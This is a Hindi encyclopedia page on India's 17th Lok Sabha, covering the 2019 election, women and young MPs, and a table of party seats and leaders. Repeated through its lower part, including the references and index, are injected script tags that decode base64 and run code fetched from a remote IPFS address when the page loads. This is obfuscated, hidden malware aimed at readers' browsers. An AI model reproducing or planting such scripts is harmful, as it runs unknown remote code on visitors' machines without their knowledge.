17वीं लोकसभा  

17वीं लोकसभा (अंग्रेज़ी: 17th Lok Sabha) के सदस्य 'भारतीय आम चुनाव, 2019' से चुने गये। भारत निर्वाचन आयोग ने आम चुनाव सात चरणों में कराये। ये चुनाव 11 अप्रैल, 2019 से 19 मई, 2019 तक हुए। मतदान की गणना 23 मई, 2019 को हुई। राष्ट्रीय दलों के 397 सांसदों को चुना गया है। इनमें 303 सांसद भाजपा के, 52 कांग्रेस के और 22 टीएमसी के हैं। राज्य स्तरीय दलों में डीएमके (23) और वाईएसआरसीपी (22) ने सबसे अधिक सीटें जीती हैं।

लोकसभा पदाधिकारी

महिला सांसद

17वीं लोकसभा में कुल 78 महिलाएं सांसद बनीं हैं। आजादी के बाद से यह आंकड़ा सर्वाधिक है। अब कुल सदन संख्या का 14.8 प्रतिशत महिलाएं हैं। 2014 में महिला सांसदों की संख्या 62 थी। लोकसभा चुनाव, 2019 में कुल 719 महिलाएं चुनाव मैदान में उतरी थीं, जिसमें 78 चुनाव जीतने में सफल रहीं। 2019 के लोकसभा चुनाव में 267 सांसद पहली बार चुनाव जीते हैं।[१]

युवा सांसद

2014 वीं लोकसभा, देश के संसदीय इतिहास में सबसे अधिक उम्र वाले सांसदों वाली लोकसभा में से एक रही। तब 543 सांसदों में 253 की औसत उम्र 55 साल से अधिक थी। 17वीं लोकसभा में सांसदों की औसत उम्र 54 साल है। इस प्रकार 2014 की तुलना में यह 'युवा संसद' है। ओडिशा की चंद्राणी मुर्मू सबसे युवा सांसद हैं। 25 साल 11 महीने की उम्र में वह सांसद बनी हैं।

सीटों की दलवार स्थिति
क्रमांक राजनीतिक दल संक्षिप्त नाम दल के सदस्य संसदीय नेता
1. भारतीय जनता पार्टी भाजपा 303 नरेन्द्र मोदी
2. भारतीय राष्ट्रीय कांग्रेस कांग्रेस 52 अधीर रंजन चौधरी
3. द्रविड़ मुन्नेत्र कड़गम द्रमुक 23 टी. आर. बालू
4. अखिल भारतीय तृणमूल कांग्रेस तृणमूल 22 सुदीप बंदोपाध्याय
5. वाई. एस. आर. कांग्रेस पार्टी वाईएसआर 22 विजयसाइ रेड्डी
6. शिवसेना शिवसेना 18 अरविंद सावंत
7. जनता दल (यूनाइटेड) जदयू 16 राजीव रंजन सिंह
8. बीजू जनता दल (बीजद) 12 पिनाकी मिश्रा
9. बहुजन समाज पार्टी बसपा 10 गिरीश चंद्र
10. तेलंगाना राष्ट्र समिति तेरास 9 नागेश्वर राव
11. लोक जनशक्ति पार्टी लोजपा 6 चिराग पासवान
12. राष्ट्रवादी कांग्रेस पार्टी राकांपा 5 सुप्रिया सुले
13. समाजवादी पार्टी सपा 5 अखिलेश यादव
14. भारतीय कम्युनिस्ट पार्टी (मार्क्सवादी) माकपा 3 -
15. तेलुगु देशम पार्टी तेदेपा 3 अभी घोषित नहीं
16. इण्डियन यूनियन मुस्लिम लीग आईयूएमएल 3 अभी घोषित नहीं
17. जम्मू और कश्मीर नेशनल कांफ्रेंस जेकेएनसी 3 फ़ारूक़ अब्दुल्ला
18. भारतीय कम्युनिस्ट पार्टी भाकपा 2 -
19. शिरोमणि अकाली दल शिअद 2 सुखबीर सिंह बादल
20. ऑल इंडिया मजलिस-ए-इत्तेहादुल मुस्लिमीन एमआइएम 2 असदुद्दीन ओवैसी
21. अपना दल (सोनेलाल) अद (सो) 2 अनुप्रिया पटेल
22. ऑल इंडिया अन्ना द्रविड़ मुन्नेत्र कड़गम अन्नाद्रमुक 1 रवींद्रनाथ कुमार पी.
23. आम आदमी पार्टी आप 1 भगवंत मान
24. जनता दल (सेक्युलर) जदसे 1 प्रज्वल रेवन्ना
25. झारखण्ड मुक्ति मोर्चा झामुमो 1 विजय कुमार हंसदक
26. ऑल झारखण्ड स्टूडेंट्स यूनियन आजसू 1 चन्द्र प्रकाश चौधरी
27. नेशनलिस्ट डेमोक्रेटिक प्रोग्रेसिव पार्टी एनडीपीपी 1 तोखेहो येप्थोमी
28. नेशनल पीपल्स पार्टी एनपीपी 1 अगाथा संगमा
29. नागा पीपल्स फ्रंट एनपीएफ़ 1 लोरहो एस. प्फोज़े
30. रिवोल्यूशनरी सोशलिस्ट पार्टी आरएसपी 1 एन. के. प्रेचन्द्रन
31. केरल कांग्रेस (एम) केसी (एम) 1 थॉमस कैज़ीकादान
32. मिज़ो नेशनल फ्रंट एमएनएफ 1 सी. लालरोसंगा
33. सिक्किम क्रन्तिकारी मोर्चा एसकेएम 1 इंदिरा हंग सुबा
34. विदुथलाई चिरुथिगाल काची वीसीके 1 तिरुमावलवन
35. ऑल इंडिया यूनाइटेड डेमोक्रेटिक फ्रंट एआईयूडीएफ़ 1 बदरुद्दीन अजमल
36. राष्ट्रीय लोकतांत्रिक पार्टी रालोपा 1 हनुमान बेनीवाल
37. निर्दलीय निर्दलीय 4 -
38. मनोनीत आंग्ल-भारतीय - 2 -
39. रिक्त रिक्त 1 -
पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

  1. 17वीं लोकसभा की छह बातें (हिंदी) aajtak.intoday.in। अभिगमन तिथि: 30 मार्च, 2020।<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

संबंधित लेख


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

वर्णमाला क्रमानुसार लेख खोज

                              अं                                                                                                       क्ष    त्र    ज्ञ             श्र   अः

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

"https://amp.bharatdiscovery.org/w/index.php?title=17वीं_लोकसभा&oldid=643850" से लिया गया